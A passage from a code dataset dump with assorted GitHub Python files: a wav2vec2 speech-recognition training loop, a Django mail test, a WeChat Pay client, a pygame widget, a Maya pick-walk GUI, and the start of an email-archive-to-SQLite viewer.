torch.nn.utils.clip_grad_norm_(model.parameters(), hp.clip)\n scaler.step(optimizer)\n scaler.update()\n else:\n loss /= hp.accum_grad\n loss.backward()\n if step % hp.accum_grad == 0:\n optimizer.step()\n\n if step % hp.accum_grad == 0 and hp.optimizer_type == 'Noam':\n if epoch < hp.decay_epoch:\n if hp.lr_tristage:\n lr = get_learning_rate_tristage(step // hp.accum_grad + 1)\n else:\n lr = get_learning_rate(step // hp.accum_grad + 1, hp)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n else:\n print('loss is nan')\n del loss\n sys.exit(1)\n if step % hp.accum_grad == 0 and hp.optimizer_type == 'Noam':\n optimizer.zero_grad()\n sys.stdout.flush()\n # calc\n #n_correct = 0\n #for i, t in enumerate(text_lengths):\n # tmp = youtputs[i, :t-1, :].max(1)[1].cpu().numpy()\n # for j in range(t-1):\n # if tmp[j] == text[i][j+1]:\n # n_correct = n_correct + 1\n #acc = 1.0 * n_correct / float(sum(text_lengths))\n #print('acc = {}'.format(acc))\n if rank == 0 and ((epoch+1) % hp.save_per_epoch >= (hp.save_per_epoch - 10) or (epoch+1) % hp.save_per_epoch == 0):\n torch.save(model.state_dict(), hp.save_dir+\"/network.epoch{}\".format(epoch+1))\n print('save model')\n \n if rank == 0 and (epoch + 1) % hp.save_per_epoch == 0:\n torch.save(optimizer.state_dict(), hp.save_dir+\"/network.optimizer.epoch{}\".format(epoch+1))\n print('save optimizer')\n\n #if args.n_gpus > 1:\n # dist.barrier()\n return step\n\n\ndef get_dataloader(step, args, hp):\n ## TODO: Mask setting\n if step // hp.accum_grad > hp.warmup_step:\n train_dataset = datasets_wav2vec2.TrainDatasets(hp.train_script, hp)\n else:\n train_dataset = datasets_wav2vec2.TrainDatasets(hp.train_script, hp)\n\n collate_fn_transformer = datasets_wav2vec2.collate_fn\n if hp.batch_size is not None:\n sampler = datasets_wav2vec2.NumBatchSampler(train_dataset, hp.batch_size)\n elif hp.max_seqlen is not None:\n sampler = datasets_wav2vec2.LengthsBatchSampler(train_dataset, hp.max_seqlen, hp.lengths_file, shuffle=True, shuffle_one_time=False, shuffle_all=hp.dataset_shuffle_all)\n\n train_sampler = datasets_wav2vec2.DistributedSamplerWrapper(sampler) if args.n_gpus > 1 else sampler\n dataloader = DataLoader(train_dataset, batch_sampler=train_sampler, num_workers=8, collate_fn=collate_fn_transformer)\n\n return dataloader\n\n\ndef train_epoch(model, optimizer, args, hp, step, start_epoch=0, rank=0):\n dataloader = get_dataloader(step, args, hp)\n\n for epoch in range(start_epoch, hp.max_epoch):\n start_time = time.time()\n if step // hp.accum_grad > hp.warmup_step:\n dataloader = get_dataloader(step, args, hp)\n\n step = train_loop(model, optimizer, step, epoch, args, hp, rank, dataloader)\n \n print(\"EPOCH {} end\".format(epoch+1))\n print('elapsed time = {}'.format(time.time() - start_time))\n\n\ndef init_distributed(rank, n_gpus, port):\n assert torch.cuda.is_available(), \"Distributed mode requires CUDA.\"\n\n torch.cuda.set_device(rank % n_gpus)\n\n os.environ['MASTER_ADDR'] = 'localhost' #dist_config.MASTER_ADDR\n os.environ['MASTER_PORT'] = port #dist_config.MASTER_PORT\n\n torch.distributed.init_process_group(\n backend='nccl', world_size=n_gpus, rank=rank\n )\n\n\ndef cleanup():\n torch.distributed.destroy_process_group()\n\n\ndef run_distributed(fn, args, hp):\n port = '60' + str(int(time.time()))[-4:]\n print(f'port = {port}')\n try:\n mp.spawn(fn, args=(args, hp, port), nprocs=args.n_gpus, join=True)\n except:\n cleanup()\n\ndef run_training(rank, args, hp, port=None):\n if args.n_gpus > 1:\n init_distributed(rank, args.n_gpus, port)\n torch.cuda.set_device(f'cuda:{rank}')\n\n ## NOTE: variable\n model = TransformerWav2vec2(hp, pretrain_model='facebook/wav2vec2-large-lv60', freeze_feature_extractor=hp.freeze_feature_extractor)\n ## TODO: change init_weight (maybe initialize all networks)\n #model.apply(init_weight)\n model.train()\n\n if rank == 0:\n print(model)\n\n model = model.to(rank)\n\n if args.n_gpus > 1:\n model = DDP(torch.nn.SyncBatchNorm.convert_sync_batchnorm(model), device_ids=[rank])\n \n max_lr = hp.init_lr\n if hp.optimizer_type == 'Noam':\n ## NOTE: scheduling?\n ## NOTE: learning rate?\n optimizer = torch.optim.Adam(model.parameters(), lr=max_lr, betas=(0.9, 0.98), eps=1e-9)\n else:\n optimizer = torch.optim.Adam(model.parameters(), lr=max_lr)\n \n assert (hp.batch_size is None) != (hp.max_seqlen is None)\n\n if args.n_gpus > 1:\n dist.barrier()\n # configure map_location properly\n map_location = {'cuda:%d' % 0: 'cuda:%d' % rank}\n\n if hp.loaded_epoch is not None:\n start_epoch = hp.loaded_epoch\n load_dir = hp.loaded_dir\n print('epoch {} loaded'.format(hp.loaded_epoch))\n loaded_dict = load_model(\"{}\".format(os.path.join(load_dir, 'network.epoch{}'.format(hp.loaded_epoch))), map_location=map_location)\n model.load_state_dict(loaded_dict)\n if hp.is_flat_start:\n step = 1\n start_epoch = 0\n print('flat_start')\n else:\n loaded_dict = torch.load(\"{}\".format(os.path.join(load_dir, 'network.optimizer.epoch{}'.format(hp.loaded_epoch))), map_location=map_location)\n optimizer.load_state_dict(loaded_dict)\n step = loaded_dict['state'][0]['step']\n #lr = get_learning_rate(step//hp.accum_grad+1, hp)\n lr = get_learning_rate_tristage(step // hp.accum_grad + 1)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n del loaded_dict\n torch.cuda.empty_cache()\n else:\n start_epoch = 0\n step = 1\n \n pytorch_total_params = sum(p.numel() for p in model.parameters())\n print('params = {0:.2f}M'.format(pytorch_total_params / 1000 / 1000))\n train_epoch(model, optimizer, args, hp, step=step, start_epoch=start_epoch, rank=rank)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--hp_file', type=str, default='hparams.py')\n args = parser.parse_args()\n hp.configure(args.hp_file)\n fill_variables(hp)\n log_config(hp)\n\n os.makedirs(hp.save_dir, exist_ok=True)\n\n n_gpus = torch.cuda.device_count()\n args.__setattr__('n_gpus', n_gpus)\n\n if n_gpus > 1:\n run_distributed(run_training, args, hp)\n else:\n run_training(0, args, hp, None)\n\nif __name__ == '__main__':\n main()\n","repo_name":"syoamakase/Transformer_ASR","sub_path":"train_wav2vec2.py","file_name":"train_wav2vec2.py","file_ext":"py","file_size_in_byte":13463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19818393111","text":"# python 3.6\n# -*- coding: utf-8 -*-\n# @Time : 2020-01-26 20:51\n# @Author : 乐天派逗逗\n# @Site : Windows 10\n# @File : send_mail.py\n# @Software: PyCharm\n# @Contact : 1584838420@qq.com\n# @Features: 邮件发送系统\n\nimport os\nfrom django.core.mail import send_mail\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'MyRegist.settings' # 必须添加 , 依赖于 Django\n\nif __name__ == '__main__':\n\n res = send_mail(\n '来自www.liujiangblog.com的测试邮件',\n '欢迎访问www.cnblogs.com/shiwei1930,这里是SUOSUO博客站点,本站专注于Python、Django技术的分享!',\n '1584838420@qq.com',\n ['1584838420@qq.com'], # target email@aliyun.com\n )\n print('res=', res) # 成功 返回 1\n\n# 对于send_mail方法,\n# 第一个参数是邮件主题subject;\n# 第二个参数是邮件具体内容;\n# 第三个参数是邮件发送方,\n# 第四个参数是接受方的邮件地址列表, 需要和你settings中的一致;\n\n","repo_name":"GabrielGuo/MyRegist","sub_path":"MyRegist/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2475965797","text":"from __future__ import absolute_import, unicode_literals\n\nfrom .core import Core\nfrom .sign_manager import SignManager\nfrom .cert_manager import CertManager\nfrom .encrypt_manager import EncryptManager\n\n\nclass WechatPayV3(Core, SignManager, CertManager, EncryptManager):\n _merchant_id = None\n _app_id = None # place a order, pay\n _serial_number = None # request header, place a order.\n _private_key_path = None # sign, request header, sensitive_field_decrypt\n _public_key_path = None # verify, sensitive_field_encrypt\n _api_v3_key = None # decrypt received notification data\n\n def __init__(self, merchant_id,\n app_id=None,\n api_v3_key=None,\n serial_number=None,\n private_key_path=None,\n public_key_path=None,\n ):\n self._merchant_id = merchant_id\n self._app_id = app_id\n self._serial_number = serial_number\n self._private_key_path = private_key_path\n self._public_key_path = public_key_path\n self._api_v3_key = api_v3_key\n\n __private_key = None\n\n @property\n def _private_key(self):\n return self.__private_key or self.load_private_key(self._private_key_path)\n\n __public_key = None\n\n @property\n def _public_key(self):\n return self.__public_key or self.load_public_key(self._public_key_path)\n\n\nclass WPV3PreRequest(WechatPayV3):\n def __init__(self, merchant_id, app_id, serial_number, private_key_path):\n super(WPV3PreRequest, self).__init__(\n merchant_id,\n app_id=app_id,\n serial_number=serial_number,\n private_key_path=private_key_path,\n )\n\n\nclass WPV3PaySign(WechatPayV3):\n def __init__(self, merchant_id, app_id, private_key_path):\n super(WPV3PaySign, self).__init__(\n merchant_id,\n app_id=app_id,\n private_key_path=private_key_path,\n )\n\n\nclass WPV3Verify(WechatPayV3):\n def __init__(self, merchant_id, public_key_path):\n super(WPV3Verify, self).__init__(\n merchant_id,\n public_key_path=public_key_path,\n )\n\n\nclass WPV3Decrypt(WechatPayV3):\n def __init__(self, merchant_id, api_v3_key):\n super(WPV3Decrypt, self).__init__(\n merchant_id,\n api_v3_key=api_v3_key,\n )\n","repo_name":"vericant/wechat_pay","sub_path":"wechat_pay_v3/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"72930768769","text":"import csv\n\nprint(\"Enter path to csv file you want to create/ edit\")\npath = input()\n\nwith open(path, 'w') as csvfile:\n fieldnames = ['nr', 'squared']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for index in range(0, 10):\n writer.writerow({'nr': index, 'squared': index*index})","repo_name":"dasMalle/AScriptADay2016","sub_path":"January/07-CSVFiles/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"549460341","text":"import pygame\nfrom pygame import mixer\n\npygame.init()\nmixer.init()\n\n\nclass Image:\n def __init__(self, screen, path, size, default_tap=True):\n self.screen = screen\n self.path = path\n self.size = size\n self.default_tap = default_tap\n self.y = self.size.y\n\n self.image = pygame.image.load(path)\n\n self.image = pygame.transform.scale(self.image, (size.width, size.height))\n \n\n def draw(self):\n self.screen.blit(self.image, (self.size.x, self.size.y))\n \n def onTap(self, event):\n if self.default_tap:\n if event.type == pygame.MOUSEBUTTONDOWN:\n if self.size.rect.collidepoint(event.pos):\n self.size.y += 3\n if event.type == pygame.MOUSEBUTTONUP:\n self.size.y = self.y\n if self.size.rect.collidepoint(event.pos):\n click = mixer.Sound('assets/sounds/click.mp3')\n mixer.Sound.set_volume(click, 1)\n mixer.Sound.play(click)\n return True\n if event.type == pygame.MOUSEBUTTONUP:\n if self.size.rect.collidepoint(event.pos):\n return True\n\n","repo_name":"omidziveh/pychess","sub_path":"widgets/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"21355171276","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''The Pickrunner base interface.\n\nThis module contains an abstract controller that is used to implement different\nDCC environments, such as Maya, and a GUI that the controller can be used for.\n\n'''\n\n# IMPORT STANDARD LIBRARIES\nimport abc\nimport textwrap\n\n# IMPORT THIRD-PARTY LIBRARIES\nfrom Qt import QtWidgets\n\n# IMPORT LOCAL LIBRARIES\nfrom . import visibility_widget\n\n\nclass DirectionPad(QtWidgets.QWidget):\n\n '''A widget that shows buttons in a grid for up/down/left/right.\n\n Like the name implies, this widget lays out its default directions like a \"+\"\n sign, with \"main_widget\" in the middle.\n\n By default this widget doesn't do anything. It's meant to be added to other\n widgets and have functions connected to its buttons.\n\n '''\n\n def __init__(self, parent=None):\n '''Create the default children for this widget.\n\n Args:\n parent (:obj:`<QtCore.QObject>`, optional):\n Qt-based associated object. Default is None.\n\n '''\n super(DirectionPad, self).__init__(parent=parent)\n self.directions = dict()\n\n self.setLayout(QtWidgets.QVBoxLayout())\n self.main_widget = QtWidgets.QPushButton('Load selection')\n self.direction_layout = QtWidgets.QGridLayout()\n\n left_button = QtWidgets.QPushButton('Left')\n right_button = QtWidgets.QPushButton('Right')\n up_button = QtWidgets.QPushButton('Up')\n down_button = QtWidgets.QPushButton('Down')\n\n widgets = [\n ('center', self.main_widget),\n ('left', left_button),\n ('right', right_button),\n ('up', up_button),\n ('down', down_button),\n ]\n\n for storage_name, widget in widgets:\n self.directions[storage_name] = widget\n widget.setObjectName(storage_name)\n\n self.direction_layout.addWidget(up_button, 0, 1)\n self.direction_layout.addWidget(left_button, 1, 0)\n self.direction_layout.addWidget(self.main_widget, 1, 1)\n self.direction_layout.addWidget(right_button, 1, 2)\n self.direction_layout.addWidget(down_button, 2, 1)\n\n self.layout().addLayout(self.direction_layout)\n\n self.main_widget.setObjectName('load_selection_widget')\n\n\nclass BehaviorControl(object):\n\n '''An abstract controller that must be implemented in subclasses.\n\n This controller is used to interface with Pickrunner.\n\n '''\n\n def __init__(self):\n '''Initialize the object and do nothing else.'''\n super(BehaviorControl, self).__init__()\n\n @staticmethod\n @abc.abstractmethod\n def get_selection(cls):\n '''list: The selected objects in the Maya scene.'''\n return []\n\n @classmethod\n @abc.abstractmethod\n def get_settings(cls, obj):\n '''dict: Any information stored in the given object that can be used.'''\n return dict()\n\n @staticmethod\n @abc.abstractmethod\n def get_object_name(cls, obj):\n '''str: Find the unique-name of the given object.'''\n return ''\n\n @classmethod\n @abc.abstractmethod\n def assign(cls, from_object, direction, to_object, settings=None):\n '''Set an object to be remapped to another object, given some direction.\n\n Args:\n from_object:\n The object that will have the direction and to_object stored onto.\n direction:\n Some unique key to store onto from_object. This direction should\n always point towards to_object. (How direction points to\n to_object is up to the developer to implement).\n to_object:\n The object to remap to when direction and from_object are given\n to :func:`BehaviorControl.do_motion`.\n\n '''\n pass\n\n @classmethod\n @abc.abstractmethod\n def do_motion(cls, direction, obj):\n '''Move the object to a given direction.\n\n How exactly it should \"move\" must be implemented in subclasses.\n For example, in Maya, this method will select a node that is associated\n with the given node-direction pair.\n\n Args:\n direction: The direction to move to.\n obj: The object to move from.\n\n '''\n pass\n\n\nclass AssignmentManagerWidget(QtWidgets.QWidget):\n\n '''A Qt widget used to pair objects together.\n\n For example, in Maya, this widget is used as a GUI to implement\n a special-pickwalk function.\n\n '''\n\n selection_mode_label = 'Selection Mode'\n assignment_mode_label = 'Assignment Mode'\n mode_options = (selection_mode_label, assignment_mode_label)\n\n def __init__(self, controller, parent=None):\n '''Create the base window and its child widgets.\n\n By default, when the GUI loads, it is set to selection mode.\n\n Args:\n controller (BehaviorControl):\n A environment controller. Basically, any function that is unique\n to a particular DCC like \"get_selection\", \"set_info\" is put here.\n parent (:obj:`<QtCore.QObject>`, optional):\n Qt-based associated object. Default is None.\n\n Raises:\n RuntimeError: If the up-arrow button doesn't exist.\n\n '''\n super(AssignmentManagerWidget, self).__init__(parent=parent)\n self.controller = controller\n self.loaded_object = None\n self._current_mode = self.selection_mode_label\n\n self.setLayout(QtWidgets.QVBoxLayout())\n\n self.autopair_check_box = QtWidgets.QCheckBox('Auto-Pair')\n self.mode_button = QtWidgets.QPushButton(self.selection_mode_label)\n self.loaded_object_widget = QtWidgets.QLineEdit()\n self.loaded_object_label = QtWidgets.QLabel('Loaded object:')\n\n self.manager = DirectionPad()\n self.assignment_info_widget = visibility_widget.ExpandCollapseWidget('Assignment Info')\n\n self.layout().addWidget(self.mode_button)\n self.layout().addStretch(1)\n self.load_widget = QtWidgets.QWidget()\n self.load_widget.setLayout(QtWidgets.QHBoxLayout())\n self.load_widget.layout().addWidget(self.loaded_object_label)\n self.load_widget.layout().addWidget(self.loaded_object_widget)\n self.layout().addWidget(self.load_widget)\n self.layout().addWidget(self.manager)\n self.layout().addWidget(self.assignment_info_widget)\n\n # Put the \"Auto-Pair\" checkbox widget next to the up-direction button\n index = self.manager.direction_layout.indexOf(self.manager.directions['up'])\n if index == -1:\n raise RuntimeError('No up arrow widget could be found')\n\n row, column, _, _ = self.manager.direction_layout.getItemPosition(index)\n self.manager.direction_layout.addWidget(self.autopair_check_box, row, column + 1)\n\n self.init_default_settings()\n self.init_interactive_settings()\n\n def init_default_settings(self):\n '''Update this widget to make sure its default display matches its input.\n\n Also set toolTips, objectNames, and other information of widgets.\n\n '''\n self.loaded_object_widget.setReadOnly(True)\n self.autopair_check_box.setChecked(True)\n self.update_appearance()\n\n self.setMinimumHeight(270)\n\n self.autopair_check_box.setToolTip(\n 'If disabled, connects are only 1-way. But if enabled, connecting an '\n 'objects will be connected 2-ways, by default.')\n\n load_tooltip = 'Select an object and then click load selection to load it'\n self.loaded_object_widget.setToolTip(load_tooltip)\n self.manager.main_widget.setToolTip(load_tooltip)\n self.loaded_object_label.setToolTip(load_tooltip)\n\n self.mode_button.setToolTip(textwrap.dedent(\n '''\n Click to change Pickrunner's modes\n\n Assignment mode lets you edit object-direction relationships like\n clicking left on \"objectA\" will move to \"objectB\".\n\n Selection mode will actually change your selection from \"objectA\"\n to \"objectB\" when you click the left button, assuming you've created\n this relationship in advance.\n\n '''))\n self.mode_button.setStyleSheet(\n '''\n QPushButton[mode=selection] {\n background-color: rgb(65, 130, 130);\n }\n QPushButton[mode=assignment] {\n background-color: rgb(178, 75, 255);\n }\n '''\n )\n self.mode_button.setProperty('mode', 'selection')\n\n self.setStyleSheet(\n '''\n QPushButton[status=\"okay\"] {\n background-color: rgb(0, 120, 0);\n }\n\n QPushButton[status=\"not_okay\"] {\n background-color: rgb(200, 200, 0);\n color: black;\n }\n '''\n )\n self.mode_button.setObjectName('mode_button')\n self.manager.setObjectName('manager_widget')\n self.assignment_info_widget.setObjectName('info_widget')\n\n def init_interactive_settings(self):\n '''Create all of the button load/selection functionality of this GUI.'''\n def load_selection():\n '''Load the selection into our GUI and update its appearance.'''\n try:\n obj = self.controller.get_selection()[-1]\n except IndexError:\n obj = None\n\n self.set_loaded_object(obj)\n\n self.manager.main_widget.clicked.connect(load_selection)\n self.mode_button.clicked.connect(self.toggle_mode)\n\n for widget in self.manager.directions.values():\n if self.is_load_selection_widget(widget):\n continue\n\n widget.clicked.connect(self.do_action)\n\n def _make_info_line_widget(self, label, obj):\n '''Create a widget that will display the direction and object info.'''\n container = QtWidgets.QWidget()\n container.setLayout(QtWidgets.QHBoxLayout())\n\n obj_widget = QtWidgets.QLineEdit()\n obj_widget.setText(self.controller.get_object_name(obj))\n obj_widget.setReadOnly(True)\n\n container.layout().addWidget(QtWidgets.QLabel(label))\n container.layout().addWidget(obj_widget)\n\n return container\n\n def is_load_selection_widget(self, widget):\n '''bool: If the given widget is the \"Load Selection\" widget.'''\n if widget == self.manager.main_widget.objectName():\n return True\n\n return widget == self.manager.main_widget\n\n def is_pairing_enabled(self):\n '''bool: If the user wants to make assignments reflective.'''\n return self.autopair_check_box.isChecked()\n\n def has_loaded_object(self):\n '''bool: If this widget has an associated object.'''\n return self.loaded_object is not None\n\n def set_loaded_object(self, obj):\n '''Change the loaded object to the given object.'''\n self.loaded_object = obj\n self.update_appearance()\n\n def set_mode(self, mode):\n '''Set the current mode of this GUI to the given mode.\n\n Raises:\n ValueError:\n If the given mode wasn't one of the expected modes.\n This method expects a mode that's defined in \"mode_options\".\n\n '''\n if mode not in self.mode_options:\n raise ValueError('Mode: \"{mode}\" was invalid. Options were, \"{opt}\".'\n ''.format(mode=mode, opt=self.mode_options))\n\n self._current_mode = mode\n self.update_appearance()\n\n def clear_info_widgets(self):\n '''Delete all of the info widgets in the GUI.'''\n expand_layout = self.assignment_info_widget.expand_widget.layout()\n for index in reversed(range(expand_layout.count())):\n try:\n expand_layout.itemAt(index).widget().deleteLater()\n except AttributeError:\n pass\n\n def do_action(self):\n '''Do the associated action for the button that called this method.\n\n Note:\n This method relies on the objectName of the widget that calls it.\n The objectName is used by the controller to modify the loaded object.\n\n Raises:\n RuntimeError: If this method was not called from a Qt widget.\n\n '''\n try:\n direction = self.sender().objectName()\n except AttributeError:\n raise RuntimeError('do_action must be called from a Qt-signal')\n\n if self._current_mode == self.selection_mode_label:\n try:\n selected = self.controller.get_selection()[-1]\n except IndexError:\n return\n\n self.controller.do_motion(direction, selected)\n return\n\n # Add the selected object as the \"object to jump to\" for our loaded\n # object + the given direction\n #\n try:\n driven_object = self.controller.get_selection()[-1]\n except IndexError:\n pass\n else:\n opposite_directions = {\n 'up': 'down',\n 'down': 'up',\n 'left': 'right',\n 'right': 'left',\n }\n self.controller.assign(self.loaded_object, direction, driven_object)\n if self.is_pairing_enabled():\n self.controller.assign(\n driven_object,\n opposite_directions[direction],\n self.loaded_object)\n\n self.update_appearance()\n\n def toggle_mode(self):\n '''Change from Selection Mode to Assignment Mode or vice-versa.'''\n index_for_the_new_mode = 1 - self.mode_options.index(self._current_mode)\n mode_label = self.mode_options[index_for_the_new_mode]\n self.set_mode(mode_label)\n\n modes = {\n self.selection_mode_label: 'selection',\n self.assignment_mode_label: 'assignment',\n }\n\n try:\n mode_property = modes[mode_label]\n except KeyError:\n mode_property = ''\n\n self.mode_button.setProperty('mode', mode_property)\n self.mode_button.style().unpolish(self.mode_button)\n self.mode_button.style().polish(self.mode_button)\n\n def update_appearance(self):\n '''Set the GUI's widget colors and options based on our stored info.'''\n self.loaded_object_widget.setText(\n 'Click \"{label}\"'.format(label=self.manager.main_widget.text()))\n\n # Repopulate the assignment details for the loaded object\n self.clear_info_widgets()\n\n reference_object = None\n\n if self._current_mode == self.assignment_mode_label:\n reference_object = self.loaded_object\n elif self._current_mode == self.selection_mode_label:\n try:\n reference_object = self.controller.get_selection()[-1]\n except IndexError:\n pass\n\n info = self.controller.get_settings(reference_object)\n\n for key in sorted(info.keys()):\n if self.is_load_selection_widget(key):\n continue\n\n assigned_direction_object = info[key]\n self.assignment_info_widget.add_widget(\n self._make_info_line_widget(key, assigned_direction_object))\n\n is_assignment_mode = self._current_mode == self.assignment_mode_label\n\n if is_assignment_mode and self.has_loaded_object():\n self.loaded_object_widget.setText(\n self.controller.get_object_name(reference_object))\n\n self.load_widget.setVisible(is_assignment_mode)\n self.autopair_check_box.setVisible(is_assignment_mode)\n self.manager.main_widget.setEnabled(is_assignment_mode)\n self.manager.main_widget.setVisible(is_assignment_mode)\n\n if is_assignment_mode and self.has_loaded_object():\n self.manager.main_widget.setProperty('status', 'okay')\n else:\n self.manager.main_widget.setProperty('status', 'not_okay')\n\n self.manager.main_widget.style().unpolish(self.manager.main_widget)\n self.manager.main_widget.style().polish(self.manager.main_widget)\n\n self.mode_button.setText(self._current_mode)\n","repo_name":"ColinKennedy/pickrunner","sub_path":"scripts/pickrunner/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":16197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"26796333838","text":"maxWeight = float(input())\nnumberOfBoxes = float(input())\nmeanWeight = float(input())\nstdDev = float(input())\n\nimport math\n\ndef lessThan(x, mean, stdDev):\n\tresult = 0.5 * (1 + math.erf((x-mean) / (stdDev * math.sqrt(2))))\n\n\treturn round(result,4)\n\nprint (lessThan(maxWeight, numberOfBoxes * meanWeight, math.sqrt(numberOfBoxes) * stdDev))","repo_name":"hebertomoreno/PythonScr","sub_path":"clt.py","file_name":"clt.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"25919888680","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Adrien Demarez\nLicense: GPLv3 https://www.gnu.org/licenses/gpl-3.0.en.html\n\nThis program\n- walks through a folder from a GMvault backup (assuming .eml are not gzipped. In my case I archived the whole dir in squashfs-lzma so it was better to leave the eml uncompressed) and parses the .meta and .eml files, the latter can be MIME with various encoding, attachments, etc.\n- or walks through an mbox file (only tested with mbox from Google Takeout, noting that Google performs some encoding conversions that permanently break all non-ascii characters (they are all replaced by 0xEFBFBD, therefore encoding display issues are not a bug in this script but in the prior encoding bugs on Google Takeout side))\n- stores the emails (header, txt, html, signatures) in an SQLite database. For HTML, the attached images are extracted and inserted as base64 embedded images within the html in order to avoid keeping a separate file\n- extracts the other attached files to a dedicated folder (so all the attached files can be accessed directly through the filesystem). If the same file (same name, same md5) has already been extracted, it will not be stored twice. If a file with similar name but different md5 has already been extracted, it will be stored with a different name\n- adds a small GUI to walk through the emails and add additional \"where\" conditions to the SQL query (for the moment it works with plain sqlite including \"like\" clauses. In the future I will test SQLite's full-text search features)\n\nTODO: (among other things)\n- refactor code. Put functions within the dedicated DB class\n- solve encoding issues for HTML\n- DB schema is simple but not optimal (3NF, etc)\n- implement full-text search with sqlite\n- look deeper in winmail.dat (rtf attachments ?) and oledata.mso\n...\n\"\"\"\n\nimport sqlite3\nimport json\nimport sys\nimport re\n\n#import mailparser # I realized afterwards that https://pypi.org/project/mail-parser/ might have done the job instead of writing custom decodemail() / decodepart() routines, but I didn't really test so for the moment I'll keep my own code :)\n#from email.iterators import _structure\nimport email,quopri\n#import email.contentmanager # FIXME: not used ?\nfrom werkzeug.utils import secure_filename\n\nimport hashlib\n#import xxhash # might replace md5 in the future since I don't need a cryptographically secure hash\n\nimport os,sys\n#import io # FIXME: unused ?\nimport time\nfrom datetime import datetime\nfrom dateutil.parser import parse as dateparse\n\nfrom PySide2.QtWidgets import *\n#from PySide2.QtWebEngineWidgets import *\nfrom PySide2.QtCore import *\nfrom PySide2.QtSql import *\nfrom PySide2.QtGui import *\nimport argparse\n\ndef gui(dbfile):\n #cwd = '' if os.path.dirname(dbfile).startswith('/') else os.getcwd()+'/'\n def loadmsg(item):\n myquery = QSqlQuery()\n myquery.exec_(\"select body_text,body_html,attachments,gmail_labels from messages where id=%d\" % (item.siblingAtColumn(0).data()))\n myquery.next()\n data=myquery.value(1) # value(1) is html, value(0) is plain text\n if data==None or data==\"\":\n data = \"<html><head><title>foobar
\" + myquery.value(0) + \"
\" # displays body_text when there is no html\n else:\n data = re.sub(r'<(meta|META) .*charset=.*>', '', data) # we already converted to utf-8 when storing html in SQLite so we filter lines such as \n\n local_textBrowser.setHtml(data)\n # I used to do local_webEngineView.setHtml(data), but setHtml has a 2MB size limit => need to switch to setUrl on tmp file for large contents\n # tmpfile = '/tmp/gmvault_sqlite_tmp.html' # FIXME: random tmp name. FIXME: delete the tmp file when it's no longer needed\n # with open(tmpfile, 'wb') as fp:\n # fp.write(data.encode())\n # local_webEngineView.setUrl(QUrl('file://' + tmpfile))\n attachlist.clear()\n for att in myquery.value(2).split('¤'):\n item = QListWidgetItem(att)\n item.setData(1, os.path.dirname(os.path.abspath(dbfile))+'/'+myquery.value(3)+'/'+att)\n #item.setData(1, cwd+os.path.dirname(dbfile)+'/'+myquery.value(3)+'/'+att)\n attachlist.addItem(item)\n\n def model_update(item=None):\n if(item != None):\n #tmp = \"labels='%s'\" % (item.data(),)\n tmp = \"labels='%s'\" % (item.siblingAtColumn(1).data(),)\n else:\n tmp=lineedit.text()\n if tmp!=None and tmp!=\"\":\n tmp=\" where \" + tmp\n model.clear()\n model.setQuery(db.exec_(\"select id, gmail_threadid thread, gm_id eml, gmail_labels labels, datetime(messages.datetime, 'unixepoch') as dt, msgfrom, msgto, msgcc, subject, flags, signature, attachments,size,sizeatt,numatt from messages\" + tmp))\n #model.setQuery(db.exec_(\"select id, gmail_threadid thread, gm_id eml, gmail_labels labels, datetime(messages.datetime, 'unixepoch') as dt, msgfrom, msgto, msgcc, subject, flags, signature, attachments from messages\" + tmp))\n while model.canFetchMore():\n model.fetchMore()\n #model.select()\n\n def createtreeitem(name): # recursive creation of parents items\n if name in itemlist:\n return itemlist[name]\n elif '/' in name:\n idx = name.rfind('/')\n parentitem = createtreeitem(name[:idx])\n item = QTreeWidgetItem(None, [name[idx+1:], name] )\n itemlist[name] = item\n parentitem.addChild(item)\n return item\n else:\n item = QTreeWidgetItem(None, [name, name] )\n itemlist[name] = item\n foldertree.insertTopLevelItem(0,item)\n return item\n\n app = QApplication(sys.argv)\n\n tabview = QTableView()\n tabview.clicked.connect(loadmsg)\n tabview.setVerticalScrollMode(QAbstractItemView.ScrollPerPixel)\n tabview.setHorizontalScrollMode(QAbstractItemView.ScrollPerPixel)\n # folderlist = QListWidget()\n # folderlist.clicked.connect(model_update)\n foldertree = QTreeWidget()\n foldertree.setColumnCount(2)\n foldertree.hideColumn(1)\n foldertree.clicked.connect(model_update)\n\n # local_webEngineView = QWebEngineView()\n local_textBrowser = QTextBrowser() # Actually QTextBrowser is enough to display basic HTML (including images) without js and without security issues that might arise with QWebEngineView parsing potentially hostile HTML...\n #local_textBrowser.setStyleSheet(\"background-color: black;\")\n attachlist = QListWidget()\n attachlist.doubleClicked.connect(lambda item: QDesktopServices.openUrl(QUrl.fromLocalFile(item.data(1))))\n #attachlist.doubleClicked.connect(lambda item: print(item.data(1)))\n\n splitter_left = QSplitter(Qt.Vertical)\n splitter_left.addWidget(tabview)\n #splitter_left.addWidget(local_webEngineView)\n splitter_left.addWidget(local_textBrowser)\n splitter_left.setSizes([800,800])\n splitter_right = QSplitter(Qt.Vertical)\n #splitter_right.addWidget(folderlist)\n splitter_right.addWidget(foldertree)\n splitter_right.addWidget(attachlist)\n 